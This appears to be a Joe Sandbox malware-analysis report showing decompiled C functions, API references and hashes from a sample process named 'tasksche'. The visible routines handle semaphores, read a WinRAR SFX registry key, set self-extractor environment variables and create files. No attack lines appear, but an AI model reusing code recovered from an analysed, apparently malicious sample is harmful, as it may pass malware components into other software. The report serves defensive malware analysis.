                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                              • String ID:
                                                                                              • API String ID: 2714421763-0
                                                                                              • Opcode ID: 1eba3eb2bfd23f5b1e043426ba5b029f38dd9947a11c8dba489f2cac3b6c6ae4
                                                                                              • Instruction ID: 0c17081243acc93c5e04f74f5850e91c5e9c62578e05a8caa74c22d26ff5c9bd
                                                                                              • Opcode Fuzzy Hash: 1eba3eb2bfd23f5b1e043426ba5b029f38dd9947a11c8dba489f2cac3b6c6ae4
                                                                                              • Instruction Fuzzy Hash: 1D01847194A215BBDB306BB29C067DE3B65AF00798F10012BFC0496291DB3C86D19A5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 100%
                                                                                              			E00411119(void* __ecx) {
                                                                                              				long* _t16;
                                                                                              				void** _t19;
                                                                                              				void* _t21;
                                                                                              
                                                                                              				_t17 = __ecx;
                                                                                              				_t21 = __ecx;
                                                                                              				E0041102B(__ecx);
                                                                                              				_t16 = 0;
                                                                                              				 *((char*)(__ecx + 0x194)) = 1;
                                                                                              				ReleaseSemaphore( *(__ecx + 0x198), 0x20, 0);
                                                                                              				if( *((intOrPtr*)(_t21 + 0x84)) > 0) {
                                                                                              					_t19 = _t21 + 4;
                                                                                              					do {
                                                                                              						E00410EA0(_t17,  *_t19);
                                                                                              						FindCloseChangeNotification( *_t19); // executed
                                                                                              						_t16 = _t16 + 1;
                                                                                              						_t19 =  &(_t19[1]);
                                                                                              					} while (_t16 <  *((intOrPtr*)(_t21 + 0x84)));
                                                                                              				}
                                                                                              				DeleteCriticalSection(_t21 + 0x1a0);
                                                                                              				FindCloseChangeNotification( *(_t21 + 0x198)); // executed
                                                                                              				return CloseHandle( *(_t21 + 0x19c));
                                                                                              			}






                                                                                              0x00411119
                                                                                              0x0041111c
                                                                                              0x0041111e
                                                                                              0x00411123
                                                                                              0x0041112e
                                                                                              0x00411135
                                                                                              0x00411147
                                                                                              0x0041114a
                                                                                              0x0041114d
                                                                                              0x0041114f
                                                                                              0x00411156
                                                                                              0x00411158
                                                                                              0x00411159
                                                                                              0x0041115c
                                                                                              0x00411164
                                                                                              0x0041116c
                                                                                              0x00411178
                                                                                              0x00411185

                                                                                              APIs
                                                                                                • Part of subcall function 0041102B: ResetEvent.KERNEL32(?,00000200,?,?,00405016), ref: 00411051
                                                                                                • Part of subcall function 0041102B: ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00411061
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000020,00000000,?,?,0044F590,00411241,?,00401024,?,?,0040128E), ref: 00411135
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000003,00000003,?,?,0044F590,00411241,?,00401024,?,?,0040128E), ref: 00411156
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,0044F590,00411241,?,00401024,?,?,0040128E), ref: 0041116C
                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,0044F590,00411241,?,00401024,?,?,0040128E), ref: 00411178
                                                                                              • CloseHandle.KERNEL32(?,?,0044F590,00411241,?,00401024,?,?,0040128E), ref: 00411180
                                                                                                • Part of subcall function 00410EA0: WaitForSingleObject.KERNEL32(?,000000FF,00410FD9,?,?,00411197,?,?,?,?,?,004111E6), ref: 00410EA6
                                                                                                • Part of subcall function 00410EA0: GetLastError.KERNEL32(?,?,?,?,?,004111E6), ref: 00410EB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ChangeFindNotificationReleaseSemaphore$CriticalDeleteErrorEventHandleLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 3803654862-0
                                                                                              • Opcode ID: 29ee5acdc12332976cb057a69276285ab821669b88e8e9e7981cd7b54762f760
                                                                                              • Instruction ID: 628da898c48b8095e2505876ae832dd6733ab043d372e65b09dbeb3e2adc3a3f
                                                                                              • Opcode Fuzzy Hash: 29ee5acdc12332976cb057a69276285ab821669b88e8e9e7981cd7b54762f760
                                                                                              • Instruction Fuzzy Hash: F9F06275101704AFD7206B70DC45BD7BBA5EB0A354F00042AF7AA41120CB7768A19B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 884 40db16-40db2a call 41aaf0 887 40db30-40db5a call 40da4f RegOpenKeyExW 884->887 888 40dbbd-40dbbe 884->888 887->888 891 40db5c-40db86 RegQueryValueExW 887->891 892 40dbb4-40dbb7 RegCloseKey 891->892 893 40db88-40db93 891->893 892->888 894 40db95 893->894 895 40db98-40dbaf call 410b9c 893->895 894->895 895->892
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DB16(void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				int _v8;
                                                                                              				void* _v12;
                                                                                              				int _v16;
                                                                                              				char _v4112;
                                                                                              				short _v8208;
                                                                                              				long _t22;
                                                                                              				signed int _t31;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				_t22 = E0041AAF0(0x200c);
                                                                                              				if( *0x441878 != 0) {
                                                                                              					E0040DA4F( &_v8208, _a4);
                                                                                              					_t22 = RegOpenKeyExW(0x80000001, L"Software\\WinRAR SFX", 0, 1,  &_v12); // executed
                                                                                              					if(_t22 == 0) {
                                                                                              						_v8 = 0x1000;
                                                                                              						if(RegQueryValueExW(_v12,  &_v8208, 0,  &_v16,  &_v4112,  &_v8) == 0) {
                                                                                              							_v8 = _v8 >> 1;
                                                                                              							_t31 = 0x7ff;
                                                                                              							if(_v8 < 0x7ff) {
                                                                                              								_t31 = _v8;
                                                                                              							}
                                                                                              							 *((short*)(_t38 + _t31 * 2 - 0x100c)) = 0;
                                                                                              							E00410B9C(_a4,  &_v4112, _a8);
                                                                                              						}
                                                                                              						return RegCloseKey(_v12);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t22;
                                                                                              			}











                                                                                              0x0040db1e
                                                                                              0x0040db2a
                                                                                              0x0040db3a
                                                                                              0x0040db51
                                                                                              0x0040db5a
                                                                                              0x0040db77
                                                                                              0x0040db86
                                                                                              0x0040db88
                                                                                              0x0040db8b
                                                                                              0x0040db93
                                                                                              0x0040db95
                                                                                              0x0040db95
                                                                                              0x0040db9d
                                                                                              0x0040dbaf
                                                                                              0x0040dbaf
                                                                                              0x00000000
                                                                                              0x0040dbb7
                                                                                              0x0040db5a
                                                                                              0x0040dbbe

                                                                                              APIs
                                                                                                • Part of subcall function 0040DA4F: _wcscpy.LIBCMT ref: 0040DA54
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000001,?,?), ref: 0040DB51
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040DB7E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040DBB7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue_wcscpy
                                                                                              • String ID: Software\WinRAR SFX
                                                                                              • API String ID: 2005349754-754673328
                                                                                              • Opcode ID: 5a2b69c89800e9bdd399ce0e9e4a259883a1022fe18fb91a4a4725133ef4c013
                                                                                              • Instruction ID: 4c76dbbd45d9bc8f01a1638326186229006e98cd85c276784524804615dea21e
                                                                                              • Opcode Fuzzy Hash: 5a2b69c89800e9bdd399ce0e9e4a259883a1022fe18fb91a4a4725133ef4c013
                                                                                              • Instruction Fuzzy Hash: 29110635A0020CEBEF219F90DD45FDE7BB8EF04345F5040B6B905A2191D7B8AA94DB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 897 4050e8-4050fd SHGetMalloc 898 405103-40513a SHBrowseForFolderW 897->898 899 4050ff-405101 897->899 901 405140-40515e SHGetPathFromIDListW 898->901 902 40513c-40513e 898->902 900 405160-405161 899->900 903 40515f 901->903 902->903 903->900
                                                                                              APIs
                                                                                              • SHGetMalloc.SHELL32(?), ref: 004050F5
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00405130
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: BrowseFolderMalloc
                                                                                              • String ID: A
                                                                                              • API String ID: 3812826013-3554254475
                                                                                              • Opcode ID: 38b49180d38aa256d497848d66ef1996a2da1d611468f43139da5b44fce9136b
                                                                                              • Instruction ID: 7c691baa3b27f7502734ebd35b11d26621297010b335108cc4fc530f71bfb90e
                                                                                              • Opcode Fuzzy Hash: 38b49180d38aa256d497848d66ef1996a2da1d611468f43139da5b44fce9136b
                                                                                              • Instruction Fuzzy Hash: F0010572900619EBDB11CFA4D909BEF7BF8EF49311F204466E805EB240D779DA058FA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 905 419cb2-419cd1 GetClassNameW 906 419cd3-419ce8 call 411e60 905->906 907 419cf9-419cfb 905->907 912 419cf8 906->912 913 419cea-419cf6 FindWindowExW 906->913 908 419d06-419d08 907->908 909 419cfd-419d00 SHAutoComplete 907->909 909->908 912->907 913->912
                                                                                              C-Code - Quality: 100%
                                                                                              			E00419CB2(long _a4) {
                                                                                              				short _v164;
                                                                                              				long _t5;
                                                                                              				long _t6;
                                                                                              				long _t8;
                                                                                              				WCHAR* _t10;
                                                                                              
                                                                                              				_t8 = _a4;
                                                                                              				_t5 = GetClassNameW(_t8,  &_v164, 0x50);
                                                                                              				if(_t5 != 0) {
                                                                                              					_t10 = L"EDIT";
                                                                                              					_t5 = E00411E60( &_v164, _t10);
                                                                                              					if(_t5 != 0) {
                                                                                              						_t5 = FindWindowExW(_t8, 0, _t10, 0); // executed
                                                                                              						_t8 = _t5;
                                                                                              					}
                                                                                              				}
                                                                                              				if(_t8 != 0) {
                                                                                              					_t6 = SHAutoComplete(_t8, 0x10); // executed
                                                                                              					return _t6;
                                                                                              				}
                                                                                              				return _t5;
                                                                                              			}








                                                                                              0x00419cbc
                                                                                              0x00419cc9
                                                                                              0x00419cd1
                                                                                              0x00419cd4
                                                                                              0x00419ce1
                                                                                              0x00419ce8
                                                                                              0x00419cf0
                                                                                              0x00419cf6
                                                                                              0x00419cf6
                                                                                              0x00419cf8
                                                                                              0x00419cfb
                                                                                              0x00419d00
                                                                                              0x00000000
                                                                                              0x00419d00
                                                                                              0x00419d08

                                                                                              APIs
                                                                                              • GetClassNameW.USER32 ref: 00419CC9
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00419D00
                                                                                                • Part of subcall function 00411E60: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409CA8,?,00000000,?,00409DC2,00000000,-00000002,?,00000000,?), ref: 00411E76
                                                                                              • FindWindowExW.USER32 ref: 00419CF0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: b027ed5b97d113a91e8e700dc85ec23dd11054ff1df16afbaa6f3d453c1c9159
                                                                                              • Instruction ID: c03662b206b47bf0f9187f3c1687b62eae72e09aaad69f108c393d7fbd584eff
                                                                                              • Opcode Fuzzy Hash: b027ed5b97d113a91e8e700dc85ec23dd11054ff1df16afbaa6f3d453c1c9159
                                                                                              • Instruction Fuzzy Hash: 3CF0E232300219BBDB305A15AD05FEB36BC9F86B40F840066FE01E2280EB68D84285BA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 914 40d5f7-40d62a SetEnvironmentVariableW call 410c58 917 40d645-40d648 914->917 918 40d62c 914->918 919 40d630-40d63b call 410b7f 918->919 922 40d63d-40d643 SetEnvironmentVariableW 919->922 923 40d62e-40d62f 919->923 922->917 923->919
                                                                                              C-Code - Quality: 87%
                                                                                              			E0040D5F7(void* __eflags, WCHAR* _a4) {
                                                                                              				char _v2052;
                                                                                              				WCHAR* _t6;
                                                                                              				int _t9;
                                                                                              				WCHAR* _t10;
                                                                                              				void* _t13;
                                                                                              
                                                                                              				_t13 = __eflags;
                                                                                              				SetEnvironmentVariableW(L"sfxcmd", _a4);
                                                                                              				_t6 = E00410C58(_t13, _a4,  &_v2052, 0x400);
                                                                                              				_t10 = _t6;
                                                                                              				if(_t10 != 0) {
                                                                                              					while(E00410B7F( *_t10 & 0x0000ffff) != 0) {
                                                                                              						_t10 =  &(_t10[1]);
                                                                                              						__eflags = _t10;
                                                                                              					}
                                                                                              					_t9 = SetEnvironmentVariableW(L"sfxpar", _t10); // executed
                                                                                              					return _t9;
                                                                                              				}
                                                                                              				return _t6;
                                                                                              			}








                                                                                              0x0040d5f7
                                                                                              0x0040d610
                                                                                              0x0040d621
                                                                                              0x0040d626
                                                                                              0x0040d62a
                                                                                              0x0040d630
                                                                                              0x0040d62f
                                                                                              0x0040d62f
                                                                                              0x0040d62f
                                                                                              0x0040d643
                                                                                              0x00000000
                                                                                              0x0040d643
                                                                                              0x0040d648

                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D610
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D643
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: bac05ca2e549dd4e556f3ae34e89e1e7b45a97b9d2e2d38533528fd9b5159ab4
                                                                                              • Instruction ID: 209d7830a902f923c059ddcb8ccd8c76eadbb62e41e0a08ffeb6939b57d6bf06
                                                                                              • Opcode Fuzzy Hash: bac05ca2e549dd4e556f3ae34e89e1e7b45a97b9d2e2d38533528fd9b5159ab4
                                                                                              • Instruction Fuzzy Hash: 29E0EC3660011437CA102A969C01EBB7A6CDBC1744F1000337E48A2080E979D89E8BED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E004087C3(void* __ecx, long _a4, long _a8, short _a12, WCHAR* _a4112, unsigned int _a4116) {
                                                                                              				long _v0;
                                                                                              				unsigned int _t34;
                                                                                              				long _t37;
                                                                                              				void* _t38;
                                                                                              				long _t46;
                                                                                              				signed int _t47;
                                                                                              				signed int _t48;
                                                                                              				intOrPtr _t50;
                                                                                              				long _t54;
                                                                                              				intOrPtr _t55;
                                                                                              				long _t62;
                                                                                              				void* _t63;
                                                                                              				void* _t66;
                                                                                              
                                                                                              				E0041AAF0(0x100c);
                                                                                              				_t34 = _a4116;
                                                                                              				_t63 = __ecx;
                                                                                              				 *((intOrPtr*)(__ecx + 0x1020)) = 0;
                                                                                              				if( *((char*)(__ecx + 0x1c)) != 0 || (_t34 & 0x00000004) != 0) {
                                                                                              					_t50 = 1;
                                                                                              				} else {
                                                                                              					_t50 = 0;
                                                                                              				}
                                                                                              				asm("sbb edi, edi");
                                                                                              				_t62 = ( ~(_t34 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
                                                                                              				if((_t34 & 0x00000001) != 0) {
                                                                                              					_t62 = _t62 | 0x40000000;
                                                                                              				}
                                                                                              				_t37 =  !(_t34 >> 3) & 0x00000001;
                                                                                              				_v0 = _t37;
                                                                                              				if(_t50 != 0) {
                                                                                              					_t37 = _t37 | 0x00000002;
                                                                                              					_v0 = _t37;
                                                                                              				}
                                                                                              				_t47 = CreateFileW;
                                                                                              				_t54 = (0 |  *((intOrPtr*)(_t63 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                                                                                              				_a8 = _t54;
                                                                                              				_t38 = CreateFileW(_a4112, _t62, _t37, 0, 3, _t54, 0); // executed
                                                                                              				_t66 = _t38;
                                                                                              				if(_t66 != 0xffffffff) {
                                                                                              					L15:
                                                                                              					 *(_t63 + 0xc) =  *(_t63 + 0xc) & 0x00000000;
                                                                                              					_t48 = _t47 & 0xffffff00 | _t66 != 0xffffffff;
                                                                                              					 *((char*)(_t63 + 0x12)) = 0;
                                                                                              					 *((char*)(_t63 + 0x10)) = 0;
                                                                                              					if(_t48 != 0) {
                                                                                              						 *(_t63 + 4) = _t66;
                                                                                              						E00410B9C(_t63 + 0x1e, _a4112, 0x800);
                                                                                              					}
                                                                                              					return _t48;
                                                                                              				} else {
                                                                                              					_a4 = GetLastError();
                                                                                              					if(E0040A3DC(_a4112,  &_a12, 0x800) == 0) {
                                                                                              						L13:
                                                                                              						if(_a4 == 2) {
                                                                                              							 *((intOrPtr*)(_t63 + 0x1020)) = 1;
                                                                                              						}
                                                                                              						goto L15;
                                                                                              					}
                                                                                              					_t66 = CreateFileW( &_a12, _t62, _v0, 0, 3, _a8, 0);
                                                                                              					_t46 = GetLastError();
                                                                                              					_t55 = 2;
                                                                                              					if(_t46 == _t55) {
                                                                                              						_a4 = _t55;
                                                                                              					}
                                                                                              					if(_t66 != 0xffffffff) {
                                                                                              						goto L15;
                                                                                              					} else {
                                                                                              						goto L13;
                                                                                              					}
                                                                                              				}
                                                                                              			}
















                                                                                              0x004087c8
                                                                                              0x004087cd
                                                                                              0x004087d7
                                                                                              0x004087e0
                                                                                              0x004087e6
                                                                                              0x004087f0
                                                                                              0x004087ec
                                                                                              0x004087ec
                                                                                              0x004087ec
                                                                                              0x004087fe
                                                                                              0x00408806
                                                                                              0x0040880e
                                                                                              0x00408810
                                                                                              0x00408810
                                                                                              0x0040881b
                                                                                              0x0040881e
                                                                                              0x00408824
                                                                                              0x00408826
                                                                                              0x00408829
                                                                                              0x00408829
                                                                                              0x00408832
                                                                                              0x0040883d
                                                                                              0x00408850
                                                                                              0x00408854
                                                                                              0x00408856
                                                                                              0x0040885b
                                                                                              0x004088c0
                                                                                              0x004088c0
                                                                                              0x004088c7
                                                                                              0x004088ca
                                                                                              0x004088ce
                                                                                              0x004088d4
                                                                                              0x004088e2
                                                                                              0x004088e9
                                                                                              0x004088e9
                                                                                              0x004088fa
                                                                                              0x0040885d
                                                                                              0x00408863
                                                                                              0x0040887f
                                                                                              0x004088af
                                                                                              0x004088b4
                                                                                              0x004088b6
                                                                                              0x004088b6
                                                                                              0x00000000
                                                                                              0x004088b4
                                                                                              0x00408897
                                                                                              0x00408899
                                                                                              0x004088a1
                                                                                              0x004088a4
                                                                                              0x004088a6
                                                                                              0x004088a6
                                                                                              0x004088ad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004088ad

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,-7FFFF7FE,?,00000000,00000003,-00000001,00000000,00000802,00000000,?,00000000,00406E59,00000000,00000005,?,00000011), ref: 00408854
                                                                                              • GetLastError.KERNEL32(?,00000000,00406E59,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 0040885D
                                                                                              • CreateFileW.KERNEL32(?,-7FFFF7FE,?,00000000,00000003,00000000,00000000,?,?,00000800,?,00000000,00406E59,00000000,00000005,?), ref: 00408895
                                                                                              • GetLastError.KERNEL32(?,00000000,00406E59,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 00408899
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 1214770103-0
                                                                                              • Opcode ID: 4d3b36c18a63bf9a6cb3bb75dabf04ddc5da56a9a0870096324c8bcc010d085f
                                                                                              • Instruction ID: e5fec55928a071c2e3d1b6f10086eb5e0cd4d8e33465c7e2028d9d916ffc9c2f
                                                                                              • Opcode Fuzzy Hash: 4d3b36c18a63bf9a6cb3bb75dabf04ddc5da56a9a0870096324c8bcc010d085f
                                                                                              • Instruction Fuzzy Hash: 083169725047449BE7309B20CD05BEB77D4AB80318F104A2EF9D0A33C2DBBE9548D75A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 77%
                                                                                              			E00401822(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				signed int _t69;
                                                                                              				signed int _t70;
                                                                                              				intOrPtr _t71;
                                                                                              				intOrPtr _t81;
                                                                                              				intOrPtr _t92;
                                                                                              				void* _t93;
                                                                                              				intOrPtr _t96;
                                                                                              				void* _t98;
                                                                                              				void* _t103;
                                                                                              
                                                                                              				_t103 = __eflags;
                                                                                              				_t94 = __edi;
                                                                                              				_t93 = __edx;
                                                                                              				E0041A4DC(E00429548, _t98);
                                                                                              				_push(__ecx);
                                                                                              				_t96 = __ecx;
                                                                                              				 *((intOrPtr*)(_t98 - 0x10)) = __ecx;
                                                                                              				E00408786(__ecx);
                                                                                              				 *((intOrPtr*)(_t98 - 4)) = 0;
                                                                                              				 *((intOrPtr*)(__ecx)) = 0x42a478;
                                                                                              				E00405F3C(__ecx + 0x1024, _t103);
                                                                                              				 *((char*)(_t98 - 4)) = 1;
                                                                                              				E0040B8E3(__ecx + 0x20e8, _t103);
                                                                                              				 *((intOrPtr*)(__ecx + 0x6538)) = 0;
                                                                                              				 *((intOrPtr*)(__ecx + 0x653c)) = 0;
                                                                                              				E004013DD(__ecx + 0x65e8);
                                                                                              				_t69 = E004013DD(__ecx + 0x8928);
                                                                                              				 *((char*)(_t98 - 4)) = 4;
                                                                                              				_t70 = _t69 & 0xffffff00 |  *((intOrPtr*)(_t98 + 8)) == 0x00000000;
                                                                                              				 *((intOrPtr*)(__ecx + 0x6524)) = 0;
                                                                                              				 *(__ecx + 0x6520) = _t70;
                                                                                              				_t105 = _t70;
                                                                                              				if(_t70 == 0) {
                                                                                              					_t71 =  *((intOrPtr*)(_t98 + 8));
                                                                                              				} else {
                                                                                              					_push(0x72a8); // executed
                                                                                              					_t81 = E0041A89A(0, _t93, __edi, _t105); // executed
                                                                                              					_t92 = _t81;
                                                                                              					 *((intOrPtr*)(_t98 + 8)) = _t92;
                                                                                              					 *((char*)(_t98 - 4)) = 5;
                                                                                              					if(_t92 == 0) {
                                                                                              						_t71 = 0;
                                                                                              					} else {
                                                                                              						_t71 = E0040A026(_t92, __edi); // executed
                                                                                              					}
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t96 + 0x6524)) = _t71;
                                                                                              				 *(_t96 + 0x6528) =  *(_t96 + 0x6528) | 0xffffffff;
                                                                                              				 *(_t96 + 0x652c) =  *(_t96 + 0x652c) | 0xffffffff;
                                                                                              				 *(_t96 + 0x6530) =  *(_t96 + 0x6530) | 0xffffffff;
                                                                                              				 *((char*)(_t96 + 0x1c)) =  *((intOrPtr*)(_t71 + 0x5195));
                                                                                              				 *((intOrPtr*)(_t96 + 0xb050)) = 2;
                                                                                              				 *((char*)(_t96 + 0xb054)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb055)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb056)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb057)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb058)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb059)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb05a)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb060)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0x6538)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0x653c)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb05b)) = 0;
